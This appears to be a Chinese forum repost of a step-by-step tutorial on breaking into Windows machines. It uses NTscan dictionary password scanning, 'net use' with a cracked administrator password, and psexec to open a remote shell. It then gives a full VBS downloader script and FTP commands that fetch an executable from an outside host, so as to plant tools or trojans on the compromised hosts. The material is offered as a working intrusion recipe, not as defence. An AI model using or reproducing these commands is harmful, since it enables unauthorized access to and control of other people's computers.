独家解析:Windows口令扫描攻击案例
出处:比特网 作者:Simeon通过本案例可以学到:
(1)如何进行Windows口令扫描
(3)利用Hscan来扫描Windows口令
比特网专家:Windows口令扫描攻击主要针对某一个IP地址或者某一个网段进口令扫描,实质是通过139、445等端口来尝试建立连接,其利用的是Dos命令“net use \\ipaddress\admin$ “password” /u:user”,只不过通过程序来实现而已。下面的案例通过扫描软件NTScan来扫描口令,扫描出口令后成功实施控制的案例。
1.设置NTScan
直接运行NTscan,在NTscan中一般只需要设置开始IP和结束IP两个地方,其它设置均可以采取默认,如图1所示。
图1 设置NTscan
说明
(1)如果是在肉鸡上面进行口令扫描,由于语言版本的不同,如果操作系统不支持中文显示,就有可能显示为乱码,这个时候设置就只能凭熟悉程度来进行设置,在本例中是在英文操作系统中使用NTscan,在其运行界面中一些汉字显示为“?”,但是不影响扫描使用,如图2所示。
图2 NTscan乱码显示
(2)在NTscan中有IPC、SMB和WMI三种扫描方式,第一种和第三种方式扫描口令较为有效,第二种主要用来扫描共享文件。利用IPC$可以与目标主机建立一个空的连接而无需用户名与密码,而且还可以得到目标主机上的用户列表。SMB(服务器信息块)协议是一种IBM协议,用于在计算机间共享文件、打印机、串口等。SMB 协议可以用在因特网的TCP/IP协议之上,也可以用在其它网络协议如IPX和NetBEUI 之上。
(3)WMI(Windows管理规范)是一项核心的Windows管理技术,WMI作为一种规范和基础结构,通过它可以访问、配置、管理和监视几乎所有的Windows资源,比如用户可以在远程计算机器上启动一个进程;设定一个在特定日期和时间运行的进程;远程启动计算机;获得本地或远程计算机的已安装程序列表;查询本地或远程计算机的Windows事件日志等等。 一般情况下,在本地计算机上执行的WMI操作也可以在远程计算机上执行,只要用户拥有该计算机的管理员权限。如果用户对远程计算机拥有权限并且远程计算机支持远程访问,那么用户就可以连接到该远程计算机并执行拥有相应权限的操作。 2.执行扫描
在NTscan运行界面中单击“开始”按钮或者单击左窗口下面的第一按钮(如果显示为乱码),开始扫描,如图3所示。
图3 扫描口令
说明
(1)NTscan扫描口令跟字典有关,其原理就是使用字典中的口令跟实际口令进行对比,如果相同即可建立连接,即破解成功,破解成功后会在下方显示。
(2)NTscan的字典文件为NT_pass.dic,用户文件为NT_user.dic,可以根据实际情况对字典文件和用户文件内容进行增加和修改。
(3)NTscan扫描结束后,会在NTscan程序当前目录下生成一个NTscan.txt文件,该文件记录扫描结果,如图4所示。
图4 NTscan扫描记录文件
(4)在NTscan中还有一些辅助功能,例如右键单击后可以执行“cmd”命令,左键单击后可以执行“连接”、“打开远程登陆”以及“映射网络驱动器”等命令,如图5所示。
图5NTscan辅助功能 3实施控制
在Dos命令提示符下输入“net use \\221.*.*.*\admin$ "mrs6100" /u:administrator”命令获取主机的管理员权限。如图6所示,命令执行成功。
图6建立连接
4执行Psexec命令
输入“psexec \\221.*.*.* cmd”命令获取一个DosShell,如图7所示。
图7获取DosShell
说明
(1)以上两步可以合并,直接在Dos命令提示符下输入“psexec \\ipaddress –u administrator -ppassword cmd”。例如在上例中可以输入“psexec \\221.*.*.* -u Administrator –pmrs6100 cmd”命令来获取一个Dos下的Shell。
(2)在有些情况下使用“psexec \\ipaddress –u administrator -ppassword cmd”命令不能正常执行。
5.从远端查看被入侵计算机端口开放情况
使用“sfind –p 221.*.*.*”命令依次查看远程主机端口开放情况,第一台主机仅仅开放了4899端口;第二台主机开放了80和4899端口;第三台主机开放了3389端口,如图8所示。
图8查看端口开放情况 6. 上传文件
在该DosShell下执行文件下载命令,将一些工具软件或者木马软件上传的被攻击计算机上面,如图9所示。
图9 上传文件
说明
(1)可以使用以下vbs脚本命令来上传文件。
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe http://www.mymuma.com/software/systeminfo.exe systeminfo.exe
(2)如果不能通过执行vbs脚本来上传文件,则可以通过执行ftp命令来上传文件,ftp命令如下:
echo open 192.168.1.1 >b
echo ftp>>b
echo ftp>>b
echo bin>>b
echo get systeminfo.exe >>b
echo bye >>b
ftp -s:b
(3)上传文件时,建议先使用“dir filename”查看文件是否存在,上传完毕后再次通过“dir filename”命令查看文件是否上传成功。
7.并查看主机基本信息
执行“systeminfo info”可以查看被入侵计算机的基本信息,该计算机操作系统为Windows 2000 Professional,如图10所示
图10 查看主机基本信息
小结
本案例通过NTscan扫描工具软件扫描主机口令,配合psexec等命令成功控制控制扫描出弱口令的计算机。 学习了哦 大家学习啊
页:
[1]